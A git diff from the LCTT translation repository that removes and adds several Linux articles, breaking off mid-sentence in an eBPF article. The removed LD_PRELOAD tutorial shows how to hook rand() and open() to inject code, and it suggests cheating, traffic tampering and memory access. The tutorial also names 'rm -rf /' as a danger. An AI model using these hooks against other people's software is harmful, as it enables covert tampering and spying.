LTS、16.04 LTS 和 Ubuntu 17.10 提供可用应用。 - -为了将这一 PPA 加入你的软件资源列表中,执行这条命令: - -``` -sudo add-apt-repository ppa:samoilov-lex/aftl-stable -``` - -接着,为了在 Ubuntu 下安装 Linux版本的安卓文件传输助手,执行: - -``` -sudo apt-get update && sudo apt install android-file-transfer -``` - -这样就行了。 - -你会在你的应用列表中发现这一应用的启动图标。 - -在你启动这一应用之前,要确保没有其他应用(比如 Nautilus)已经挂载了你的手机。如果其它应用正在使用你的手机,就会显示“无法找到 MTP 设备”。要解决这一问题,将你的手机从 Nautilus(或者任何正在使用你的手机的应用)上移除,然后再重新启动安卓文件传输助手。 - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux - -作者:[JOEY SNEDDON][a] -译者:[wenwensnow](https://github.com/wenwensnow) -校对:[wxy](https://github.com/wxy) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/app -[3]:http://www.omgubuntu.co.uk/category/download -[4]:https://github.com/whoozle/android-file-transfer-linux -[5]:http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux -[6]:http://android.com/filetransfer?linkid=14270770 -[7]:https://en.wikipedia.org/wiki/Media_Transfer_Protocol -[8]:https://en.wikipedia.org/wiki/GVfs -[9]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg -[10]:https://launchpad.net/~samoilov-lex/+archive/ubuntu/aftl-stable diff --git a/published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md deleted file mode 100644 index 9b6a4f242c..0000000000 --- a/published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md +++ /dev/null @@ -1,72 +0,0 @@ -开源云技能认证:系统管理员的核心竞争力 -========= - -![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") - -> [2017年开源工作报告][1](以下简称“报告”)显示,具有开源云技术认证的系统管理员往往能获得更高的薪酬。 - - -报告调查的受访者中,53% 认为系统管理员是雇主们最期望被填补的职位空缺之一,因此,技术娴熟的系统管理员更受青睐而收获高薪职位,但这一职位,并没想象中那么容易填补。 - -系统管理员主要负责服务器和其他电脑操作系统的安装、服务支持和维护,及时处理服务中断和预防其他问题的出现。 - -总的来说,今年的报告指出开源领域人才需求最大的有开源云(47%),应用开发(44%),大数据(43%),开发运营和安全(42%)。 - -此外,报告对人事经理的调查显示,58% 期望招揽更多的开源人才,67% 认为开源人才的需求增长会比业内其他领域更甚。有些单位视开源人才为招聘最优选则,它们招聘的开源人才较上年增长了 2 个百分点。 - -同时,89% 的人事经理认为很难找到颇具天赋的开源人才。 - -### 为什么要获取认证 - -报告显示,对系统管理员的需求刺激着人事经理为 53% 的组织/机构提供正规的培训和专业技术认证,而这一比例去年为 47%。 - -对系统管理方面感兴趣的 IT 人才考虑获取 Linux 认证已成为行业规律。随便查看几个知名的招聘网站,你就能发现:[CompTIA Linux+][3] 认证是入门级 Linux 系统管理员的最高认证;如果想胜任高级别的系统管理员职位,获取[红帽认证工程师(RHCE)][4]和[红帽认证系统管理员(RHCSA)][5]则是不可或缺的。 - -戴士(Dice)[2017 技术行业薪资调查][6]显示,2016 年系统管理员的薪水为 79,538 美元,较上年下降了 0.8%;系统架构师的薪水为 125,946 美元,同比下降 4.7%。尽管如此,该调查发现“高水平专业人才仍最受欢迎,特别是那些精通支持产业转型发展所需技术的人才”。 - -在开源技术方面,HBase(一个开源的分布式数据库)技术人才的薪水在戴士 2017 技术行业薪资调查中排第一。在计算机网络和数据库领域,掌握 OpenVMS 操作系统技术也能获得高薪。 - -### 成为出色的系统管理员 - -出色的系统管理员须在问题出现时马上处理,这意味着你必须时刻准备应对可能出现的状况。这个职位追求“零责备的、精益的、流程或技术上交互式改进的”思维方式和善于自我完善的人格,成为一个系统管理员意味着“你必将与开源软件如 Linux、BSD 甚至开源 Solaris 等结下不解之缘”,Paul English ^译注1 在 [opensource.com][7] 上发文指出。 - -Paul English 认为,现在的系统管理员较以前而言,要更多地与软件打交道,而且要能够编写脚本来协助系统管理。 - ->译注1:Paul English,计算机科学学士,UNIX/Linux 系统管理员,PreOS Security Inc. 公司 CEO,2015-2017 年于为推动系统管理员发展实践的非盈利组织——专业系统管理员联盟League of Professional System Administrator担任董事会成员。 - -### 展望 2018 - -[Robert Half 2018 年技术人才薪资导览][8]预测 2018 年北美地区许多单位将聘用大量系统管理方面的专业人才,同时个人软实力和领导力水平作为优秀人才的考量因素,越来越受到重视。 - -该报告指出:“良好的聆听能力和批判性思维能力对于理解和解决用户的问题和担忧至关重要,也是 IT 从业者必须具备的重要技能,特别是从事服务台和桌面支持工作相关的技术人员。” - -这与[Linux基金会][9]^译注2 提出的不同阶段的系统管理员必备技能相一致,都强调了强大的分析能力和快速处理问题的能力。 - ->译注2:Linux 基金会The Linux Foundation,成立于 2000 年,致力于围绕开源项目构建可持续发展的生态系统,以加速开源项目的技术开发和商业应用;它是世界上最大的开源非盈利组织,在推广、保护和推进 Linux 发展,协同开发,维护“历史上最大的共享资源”上功勋卓越。 - -如果想逐渐爬上系统管理员职位的金字塔上层,还应该对系统配置的结构化方法充满兴趣;且拥有解决系统安全问题的经验;用户身份验证管理的经验;与非技术人员进行非技术交流的能力;以及优化系统以满足最新的安全需求的能力。 - -- [下载][10]2017年开源工作报告全文,以获取更多信息。 - - ------------------------ - -via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins - -作者:[linux.com][a] -译者:[wangy325](https://github.com/wangy325) -校对:[wxy](https://github.com/wxy) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins -[1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ -[2]:https://www.linux.com/licenses/category/creative-commons-zero -[3]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx -[4]:https://www.redhat.com/en/services/certification/rhce -[5]:https://www.redhat.com/en/services/certification/rhcsa -[6]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 -[7]:https://opensource.com/article/17/7/truth-about-sysadmins -[8]:https://www.roberthalf.com/salary-guide/technology -[9]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 -[10]:http://bit.ly/2017OSSjobsreport \ No newline at end of file diff --git a/published/201711/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md similarity index 100% rename from published/201711/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md rename to published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md diff --git a/published/20171130 Search DuckDuckGo from the Command Line.md b/published/20171130 Search DuckDuckGo from the Command Line.md deleted file mode 100644 index 48b6fdd830..0000000000 --- a/published/20171130 Search DuckDuckGo from the Command Line.md +++ /dev/null @@ -1,97 +0,0 @@ -在命令行中使用 DuckDuckGo 搜索 -============= - -![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) - -此前我们介绍了[如何在命令行中使用 Google 搜索][3]。许多读者反馈说他们平时使用 [Duck Duck Go][4],这是一个功能强大而且保密性很强的搜索引擎。 - -正巧,最近出现了一款能够从命令行搜索 DuckDuckGo 的工具。它叫做 ddgr(我把它读作 “dodger”),非常好用。 - -像 [Googler][7] 一样,ddgr 是一个完全开源而且非官方的工具。没错,它并不属于 DuckDuckGo。所以,如果你发现它返回的结果有些奇怪,请先询问这个工具的开发者,而不是搜索引擎的开发者。 - -### DuckDuckGo 命令行应用 - -![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) - -[DuckDuckGo Bangs(DuckDuckGo 快捷搜索)][8] 可以帮助你轻易地在 DuckDuckGo 上找到想要的信息(甚至 _本网站 omgubuntu_ 都有快捷搜索)。ddgr 非常忠实地呈现了这个功能。 - -和网页版不同的是,你可以更改每页返回多少结果。这比起每次查询都要看三十多条结果要方便一些。默认界面经过了精心设计,在不影响可读性的情况下尽量减少了占用空间。 - -`ddgr` 有许多功能和亮点,包括: - -* 更改搜索结果数 -* 支持 Bash 自动补全 -* 使用 DuckDuckGo Bangs -* 在浏览器中打开链接 -* ”手气不错“选项 -* 基于时间、地区、文件类型等的筛选功能 -* 极少的依赖项 - -你可以从 Github 的项目页面上下载支持各种系统的 `ddgr`: - -- [从 Github 下载 “ddgr”][9] - -另外,在 Ubuntu 16.04 LTS 或更新版本中,你可以使用 PPA 安装 ddgr。这个仓库由 ddgr 的开发者维护。如果你想要保持在最新版本的话,推荐使用这种方式安装。 - -需要提醒的是,在本文创作时,这个 PPA 中的 ddgr _并不是_ 最新版本,而是一个稍旧的版本(缺少 -num 选项)。 - -使用以下命令添加 PPA: - -``` -sudo add-apt-repository ppa:twodopeshaggy/jarun -sudo apt-get update -``` - -### 如何使用 ddgr 在命令行中搜索 DuckDuckGo - -安装完毕后,你只需打开你的终端模拟器,并运行: - -``` -ddgr -``` - -然后输入查询内容: - -``` -search-term -``` - -你可以限制搜索结果数: - -``` -ddgr --num 5 search-term -``` - -或者自动在浏览器中打开第一条搜索结果: - - -``` -ddgr -j search-term -``` - -你可以使用参数和选项来提高搜索精确度。使用以下命令来查看所有的参数: - -``` -ddgr -h -``` - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app - -作者:[JOEY SNEDDON][a] -译者:[yixunx](https://github.com/yixunx) -校对:[wxy](https://github.com/wxy) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/download -[3]:http://www.omgubuntu.co.uk/2017/08/search-google-from-the-command-line -[4]:http://duckduckgo.com/ -[5]:http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app -[6]:https://github.com/jarun/ddgr -[7]:https://github.com/jarun/googler -[8]:https://duckduckgo.com/bang -[9]:https://github.com/jarun/ddgr/releases/tag/v1.1 diff --git a/sources/tech/20090701 The One in Which I Call Out Hacker News.md b/sources/tech/20090701 The One in Which I Call Out Hacker News.md new file mode 100644 index 0000000000..44c751dd5a --- /dev/null +++ b/sources/tech/20090701 The One in Which I Call Out Hacker News.md @@ -0,0 +1,86 @@ +translating by hopefully2333 + +# [The One in Which I Call Out Hacker News][14] + + +> “Implementing caching would take thirty hours. Do you have thirty extra hours? No, you don’t. I actually have no idea how long it would take. Maybe it would take five minutes. Do you have five minutes? No. Why? Because I’m lying. It would take much longer than five minutes. That’s the eternal optimism of programmers.” +> +> — Professor [Owen Astrachan][1] during 23 Feb 2004 lecture for [CPS 108][2] + +[Accusing open-source software of being a royal pain to use][5] is not a new argument; it’s been said before, by those much more eloquent than I, and even by some who are highly sympathetic to the open-source movement. Why go over it again? + +On Hacker News on Monday, I was amused to read some people saying that [writing StackOverflow was hilariously easy][6]—and proceeding to back up their claim by [promising to clone it over July 4th weekend][7]. Others chimed in, pointing to [existing][8] [clones][9] as a good starting point. + +Let’s assume, for sake of argument, that you decide it’s okay to write your StackOverflow clone in ASP.NET MVC, and that I, after being hypnotized with a pocket watch and a small club to the head, have decided to hand you the StackOverflow source code, page by page, so you can retype it verbatim. We’ll also assume you type like me, at a cool 100 WPM ([a smidge over eight characters per second][10]), and unlike me,  _you_  make zero mistakes. StackOverflow’s *.cs, *.sql, *.css, *.js, and *.aspx files come to 2.3 MB. So merely typing the source code back into the computer will take you about eighty hours if you make zero mistakes. + +Except, of course, you’re not doing that; you’re going to implement StackOverflow from scratch. So even assuming that it took you a mere ten times longer to design, type out, and debug your own implementation than it would take you to copy the real one, that already has you coding for several weeks straight—and I don’t know about you, but I am okay admitting I write new code  _considerably_  less than one tenth as fast as I copy existing code. + + _Well, okay_ , I hear you relent. *So not the whole thing. But I can do **most** of it.* + +Okay, so what’s “most”? There’s simply asking and responding to questions—that part’s easy. Well, except you have to implement voting questions and answers up and down, and the questioner should be able to accept a single answer for each question. And you can’t let people upvote or accept their own answers, so you need to block that. And you need to make sure that users don’t upvote or downvote another user too many times in a certain amount of time, to prevent spambots. Probably going to have to implement a spam filter, too, come to think of it, even in the basic design, and you also need to support user icons, and you’re going to have to find a sanitizing HTML library you really trust and that interfaces well with Markdown (provided you do want to reuse [that awesome editor][11] StackOverflow has, of course). You’ll also need to purchase, design, or find widgets for all the controls, plus you need at least a basic administration interface so that moderators can moderate, and you’ll need to implement that scaling karma thing so that you give users steadily increasing power to do things as they go. + +But if you do  _all that_ , you  _will_  be done. + +Except…except, of course, for the full-text search, especially its appearance in the search-as-you-ask feature, which is kind of indispensable. And user bios, and having comments on answers, and having a main page that shows you important questions but that bubbles down steadily à la reddit. Plus you’ll totally need to implement bounties, and support multiple OpenID logins per user, and send out email notifications for pertinent events, and add a tagging system, and allow administrators to configure badges by a nice GUI. And you’ll need to show users’ karma history, upvotes, and downvotes. And the whole thing has to scale really well, since it could be slashdotted/reddited/StackOverflown at any moment. + +But  _then_ ! **Then** you’re done! + +…right after you implement upgrades, internationalization, karma caps, a CSS design that makes your site not look like ass, AJAX versions of most of the above, and G-d knows what else that’s lurking just beneath the surface that you currently take for granted, but that will come to bite you when you start to do a real clone. + +Tell me: which of those features do you feel you can cut and still have a compelling offering? Which ones go under “most” of the site, and which can you punt? + +Developers think cloning a site like StackOverflow is easy for the same reason that open-source software remains such a horrible pain in the ass to use. When you put a developer in front of StackOverflow, they don’t really  _see_ StackOverflow. What they actually  _see_  is this: + +``` +create table QUESTION (ID identity primary key, + TITLE varchar(255), --- why do I know you thought 255? + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + USER integer references USER(ID)); +create table RESPONSE (ID identity primary key, + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + QUESTION integer references QUESTION(ID)) +``` + +If you then tell a developer to replicate StackOverflow, what goes into his head are the above two SQL tables and enough HTML to display them without formatting, and that really  _is_  completely doable in a weekend. The smarter ones will realize that they need to implement login and logout, and comments, and that the votes need to be tied to a user, but that’s still totally doable in a weekend; it’s just a couple more tables in a SQL back-end, and the HTML to show their contents. Use a framework like Django, and you even get basic users and comments for free. + +But that’s  _not_  what StackOverflow is about. Regardless of what your feelings may be on StackOverflow in general, most visitors seem to agree that the user experience is smooth, from start to finish. They feel that they’re interacting with a polished product. Even if I didn’t know better, I would guess that very little of what actually makes StackOverflow a continuing success has to do with the database schema—and having had a chance to read through StackOverflow’s source code, I know how little really does. There is a  _tremendous_  amount of spit and polish that goes into making a major website highly usable. A developer, asked how hard something will be to clone, simply  _does not think about the polish_ , because  _the polish is incidental to the implementation._ + +That is why an open-source clone of StackOverflow will fail. Even if someone were to manage to implement most of StackOverflow “to spec,” there are some key areas that would trip them up. Badges, for example, if you’re targeting end-users, either need a GUI to configure rules, or smart developers to determine which badges are generic enough to go on all installs. What will actually happen is that the developers will bitch and moan about how you can’t implement a really comprehensive GUI for something like badges, and then bikeshed any proposals for standard badges so far into the ground that they’ll hit escape velocity coming out the other side. They’ll ultimately come up with the same solution that bug trackers like Roundup use for their workflow: the developers implement a generic mechanism by which anyone, truly anyone at all, who feels totally comfortable working with the system API in Python or PHP or whatever, can easily add their own customizations. And when PHP and Python are so easy to learn and so much more flexible than a GUI could ever be, why bother with anything else? + +Likewise, the moderation and administration interfaces can be punted. If you’re an admin, you have access to the SQL server, so you can do anything really genuinely administrative-like that way. Moderators can get by with whatever django-admin and similar systems afford you, since, after all, few users are mods, and mods should understand how the sites  _work_ , dammit. And, certainly, none of StackOverflow’s interface failings will be rectified. Even if StackOverflow’s stupid requirement that you have to have and know how to use an OpenID (its worst failing) eventually gets fixed, I’m sure any open-source clones will rabidly follow it—just as GNOME and KDE for years slavishly copied off Windows, instead of trying to fix its most obvious flaws. + +Developers may not care about these parts of the application, but end-users do, and take it into consideration when trying to decide what application to use. Much as a good software company wants to minimize its support costs by ensuring that its products are top-notch before shipping, so, too, savvy consumers want to ensure products are good before they purchase them so that they won’t  _have_  to call support. Open-source products fail hard here. Proprietary solutions, as a rule, do better. + +That’s not to say that open-source doesn’t have its place. This blog runs on Apache, [Django][12], [PostgreSQL][13], and Linux. But let me tell you, configuring that stack is  _not_  for the faint of heart. PostgreSQL needs vacuuming configured on older versions, and, as of recent versions of Ubuntu and FreeBSD, still requires the user set up the first database cluster. MS SQL requires neither of those things. Apache…dear heavens, don’t even get me  _started_  on trying to explain to a novice user how to get virtual hosting, MovableType, a couple Django apps, and WordPress all running comfortably under a single install. Hell, just trying to explain the forking vs. threading variants of Apache to a technically astute non-developer can be a nightmare. IIS 7 and Apache with OS X Server’s very much closed-source GUI manager make setting up those same stacks vastly simpler. Django’s a great a product, but it’s nothing  _but_  infrastructure—exactly the thing that I happen to think open-source  _does_  do well,  _precisely_  because of the motivations that drive developers to contribute. + +The next time you see an application you like, think very long and hard about all the user-oriented details that went into making it a pleasure to use, before decrying how you could trivially reimplement the entire damn thing in a weekend. Nine times out of ten, when you think an application was ridiculously easy to implement, you’re completely missing the user side of the story. + +-------------------------------------------------------------------------------- + +via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ + +作者:[Benjamin Pollack][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bitquabit.com/meta/about/ +[1]:http://www.cs.duke.edu/~ola/ +[2]:http://www.cs.duke.edu/courses/cps108/spring04/ +[3]:https://bitquabit.com/categories/programming +[4]:https://bitquabit.com/categories/technology +[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/ +[6]:http://news.ycombinator.com/item?id=678501 +[7]:http://news.ycombinator.com/item?id=678704 +[8]:http://code.google.com/p/cnprog/ +[9]:http://code.google.com/p/soclone/ +[10]:http://en.wikipedia.org/wiki/Words_per_minute +[11]:http://github.com/derobins/wmd/tree/master +[12]:http://www.djangoproject.com/ +[13]:http://www.postgresql.org/ +[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/ diff --git a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md deleted file mode 100644 index 2329fadd41..0000000000 --- a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md +++ /dev/null @@ -1,211 +0,0 @@ -# Dynamic linker tricks: Using LD_PRELOAD to cheat, inject features and investigate programs - -**This post assumes some basic C skills.** - -Linux puts you in full control. This is not always seen from everyone’s perspective, but a power user loves to be in control. I’m going to show you a basic trick that lets you heavily influence the behavior of most applications, which is not only fun, but also, at times, useful. - -#### A motivational example - -Let us begin with a simple example. Fun first, science later. - - -random_num.c: -``` -#include -#include -#include - -int main(){ - srand(time(NULL)); - int i = 10; - while(i--) printf("%d\n",rand()%100); - return 0; -} -``` - -Simple enough, I believe. I compiled it with no special flags, just - -> ``` -> gcc random_num.c -o random_num -> ``` - -I hope the resulting output is obvious – ten randomly selected numbers 0-99, hopefully different each time you run this program. - -Now let’s pretend we don’t really have the source of this executable. Either delete the source file, or move it somewhere – we won’t need it. We will significantly modify this programs behavior, yet without touching it’s source code nor recompiling it. - -For this, lets create another simple C file: - - -unrandom.c: -``` -int rand(){ - return 42; //the most random number in the universe -} -``` - -We’ll compile it into a shared library. - -> ``` -> gcc -shared -fPIC unrandom.c -o unrandom.so -> ``` - -So what we have now is an application that outputs some random data, and a custom library, which implements the rand() function as a constant value of 42\.  Now… just run  _random_num _ this way, and watch the result: - -> ``` -> LD_PRELOAD=$PWD/unrandom.so ./random_nums -> ``` - -If you are lazy and did not do it yourself (and somehow fail to guess what might have happened), I’ll let you know – the output consists of ten 42’s. - -This may be even more impressive it you first: - -> ``` -> export LD_PRELOAD=$PWD/unrandom.so -> ``` - -and then run the program normally. An unchanged app run in an apparently usual manner seems to be affected by what we did in our tiny library… - -###### **Wait, what? What did just happen?** - -Yup, you are right, our program failed to generate random numbers, because it did not use the “real” rand(), but the one we provided – which returns 42 every time. - -###### **But we *told* it to use the real one. We programmed it to use the real one. Besides, at the time we created that program, the fake rand() did not even exist!** - -This is not entirely true. We did not choose which rand() we want our program to use. We told it just to use rand(). - -When our program is started, certain libraries (that provide functionality needed by the program) are loaded. We can learn which are these using  _ldd_ : - -> ``` -> $ ldd random_nums -> linux-vdso.so.1 => (0x00007fff4bdfe000) -> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000) -> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000) -> ``` - -What you see as the output is the list of libs that are needed by  _random_nums_ . This list is built into the executable, and is determined compile time. The exact output might slightly differ on your machine, but a **libc.so** must be there – this is the file which provides core C functionality. That includes the “real” rand(). - -We can have a peek at what functions does libc provide. I used the following to get a full list: - -> ``` -> nm -D /lib/libc.so.6 -> ``` - -The  _nm_  command lists symbols found in a binary file. The -D flag tells it to look for dynamic symbols, which makes sense, as libc.so.6 is a dynamic library. The output is very long, but it indeed lists rand() among many other standard functions. - -Now what happens when we set up the environmental variable LD_PRELOAD? This variable **forces some libraries to be loaded for a program**. In our case, it loads  _unrandom.so_  for  _random_num_ , even though the program itself does not ask for it. The following command may be interesting: - -> ``` -> $ LD_PRELOAD=$PWD/unrandom.so ldd random_nums -> linux-vdso.so.1 => (0x00007fff369dc000) -> /some/path/to/unrandom.so (0x00007f262b439000) -> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000) -> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000) -> ``` - -Note that it lists our custom library. And indeed this is the reason why it’s code get’s executed:  _random_num_  calls rand(), but if  _unrandom.so_  is loaded it is our library that provides implementation for rand(). Neat, isn’t it? - -#### Being transparent - -This is not enough. I’d like to be able to inject some code into an application in a similar manner, but in such way that it will be able to function normally. It’s clear if we implemented open() with a simple “ _return 0;_ “, the application we would like to hack should malfunction. The point is to be **transparent**, and to actually call the original open: - -inspect_open.c: -``` -int open(const char *pathname, int flags){ - /* Some evil injected code goes here. */ - return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so -} -``` - -Hm. Not really. This won’t call the “original” open(…). Obviously, this is an endless recursive call. - -How do we access the “real” open function? It is needed to use the programming interface to the dynamic linker. It’s simpler than it sounds. Have a look at this complete example, and then I’ll explain what happens there: - -inspect_open.c: - -``` -#define _GNU_SOURCE -#include - -typedef int (*orig_open_f_type)(const char *pathname, int flags); - -int open(const char *pathname, int flags, ...) -{ - /* Some evil injected code goes here. */ - - orig_open_f_type orig_open; - orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open"); - return orig_open(pathname,flags); -} -``` - -The  _dlfcn.h_  is needed for  _dlsym_  function we use later. That strange  _#define_  directive instructs the compiler to enable some non-standard stuff, we need it to enable  _RTLD_NEXT_  in  _dlfcn.h_ . That typedef is just creating an alias to a complicated pointer-to-function type, with arguments just as the original open – the alias name is  _orig_open_f_type_ , which we’ll use later. - -The body of our custom open(…) consists of some custom code. The last part of it creates a new function pointer  _orig_open_  which will point to the original open(…) function. In order to get the address of that function, we ask  _dlsym_  to find for us the next “open” function on dynamic libraries stack. Finally, we call that function (passing the same arguments as were passed to our fake “open”), and return it’s return value as ours. - -As the “evil injected code” I simply used: - -inspect_open.c (fragment): - -``` -printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h! -``` - -To compile it, I needed to slightly adjust compiler flags: - -> ``` -> gcc -shared -fPIC  inspect_open.c -o inspect_open.so -ldl -> ``` - -I had to append  _-ldl_ , so that this shared library is linked to  _libdl_ , which provides the  _dlsym_  function. (Nah, I am not going to create a fake version of  _dlsym_ , though this might be fun.) - -So what do I have in result? A shared library, which implements the open(…) function so that it behaves **exactly** as the real open(…)… except it has a side effect of  _printf_ ing the file path :-) - -If you are not convinced this is a powerful trick, it’s the time you tried the following: - -> ``` -> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator -> ``` - -I encourage you to see the result yourself, but basically it lists every file this application accesses. In real time. - -I believe it’s not that hard to imagine why this might be useful for debugging or investigating unknown applications. Please note, however, that this particular trick is not quite complete, because  _open()_  is not the only function that opens files… For example, there is also  _open64()_  in the standard library, and for full investigation you would need to create a fake one too. - -#### **Possible uses** - -If you are still with me and enjoyed the above, let me suggest a bunch of ideas of what can be achieved using this trick. Keep in mind that you can do all the above without to source of the affected app! - -1. ~~Gain root privileges.~~ Not really, don’t even bother, you won’t bypass any security this way. (A quick explanation for pros: no libraries will be preloaded this way if ruid != euid) - -2. Cheat games: **Unrandomize.** This is what I did in the first example. For a fully working case you would need also to implement a custom  _random()_ ,  _rand_r()_ _, random_r()_ . Also some apps may be reading from  _/dev/urandom_  or so, you might redirect them to  _/dev/null_  by running the original  _open()_  with a modified file path. Furthermore, some apps may have their own random number generation algorithm, there is little you can do about that (unless: point 10 below). But this looks like an easy exercise for beginners. - -3. Cheat games: **Bullet time. **Implement all standard time-related functions pretend the time flows two times slower. Or ten times slower. If you correctly calculate new values for time measurement, timed  _sleep_ functions, and others, the affected application will believe the time runs slower (or faster, if you wish), and you can experience awesome bullet-time action. - Or go **even one step further** and let your shared library also be a DBus client, so that you can communicate with it real time. Bind some shortcuts to custom commands, and with some additional calculations in your fake timing functions you will be able to enable&disable the slow-mo or fast-forward anytime you wish. - -4. Investigate apps: **List accessed files.** That’s what my second example does, but this could be also pushed further, by recording and monitoring all app’s file I/O. - -5. Investigate apps: **Monitor internet access.** You might do this with Wireshark or similar software, but with this trick you could actually gain control of what an app sends over the web, and not just look, but also affect the exchanged data. Lots of possibilities here, from detecting spyware, to cheating in multiplayer games, or analyzing & reverse-engineering protocols of closed-source applications. - -6. Investigate apps: **Inspect GTK structures.** Why just limit ourselves to standard library? Let’s inject code in all GTK calls, so that we can learn what widgets does an app use, and how are they structured. This might be then rendered either to an image or even to a gtkbuilder file! Super useful if you want to learn how does some app manage its interface! - -7. **Sandbox unsafe applications.** If you don’t trust some app and are afraid that it may wish to _ rm -rf / _ or do some other unwanted file activities, you might potentially redirect all it’s file IO to e.g. /tmp by appropriately modifying the arguments it passes to all file-related functions (not just  _open_ , but also e.g. removing directories etc.). It’s more difficult trick that a chroot, but it gives you more control. It would be only as safe as complete your “wrapper” was, and unless you really know what you’re doing, don’t actually run any malicious software this way. - -8. **Implement features.** [zlibc][1] is an actual library which is run this precise way; it uncompresses files on the go as they are accessed, so that any application can work on compressed data without even realizing it. - -9. **Fix bugs. **Another real-life example: some time ago (I am not sure this is still the case) Skype – which is closed-source – had problems capturing video from some certain webcams. Because the source could not be modified as Skype is not free software, this was fixed by preloading a library that would correct these problems with video. - -10. Manually **access application’s own memory**. Do note that you can access all app data this way. This may be not impressive if you are familiar with software like CheatEngine/scanmem/GameConqueror, but they all require root privileges to work. LD_PRELOAD does not. In fact, with a number of clever tricks your injected code might access all app memory, because, in fact, it gets executed by that application itself. You might modify everything this application can. You can probably imagine this allows a lot of low-level hacks… but I’ll post an article about it another time. - -These are only the ideas I came up with. I bet you can find some too, if you do – share them by commenting! - --------------------------------------------------------------------------------- - -via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/ - -作者:[Rafał Cieślak ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://rafalcieslak.wordpress.com/ -[1]:http://www.zlibc.linux.lu/index.html diff --git a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md deleted file mode 100644 index a53270f2d7..0000000000 --- a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md +++ /dev/null @@ -1,361 +0,0 @@ -How to turn any syscall into an event: Introducing eBPF Kernel probes -============================================================ - - -TL;DR: Using eBPF in recent (>=4.4) Linux kernel, you can turn any kernel function call into a user land event with arbitrary data. This is made easy by bcc. The probe is written in C while the data is handled by python. - -If you are not familiar with eBPF or linux tracing, you really should read the full post. It tries to progressively go through the pitfalls I stumbled unpon while playing around with bcc / eBPF while saving you a lot of the time I spent searching and digging. - -### A note on push vs pull in a Linux world - -When I started to work on containers, I was wondering how we could update a load balancer configuration dynamically based on actual system state. A common strategy, which works, it to let the container orchestrator trigger a load balancer configuration update whenever it starts a container and then let the load balancer poll the container until some health check passes. It may be a simple “SYN” test. - -While this configuration works, it has the downside of making your load balancer waiting for some system to be available while it should be… load balancing. - -Can we do better? - -When you want a program to react to some change in a system there are 2 possible strategies. The program may  _poll_  the system to detect changes or, if the system supports it, the system may  _push_ events and let the program react to them. Wether you want to use push or poll depends on the context. A good rule of the thumb is to use push events when the event rate is low with respect to the processing time and switch to polling when the events are coming fast or the system may become unusable. For example, typical network driver will wait for events from the network card while frameworks like dpdk will actively poll the card for events to 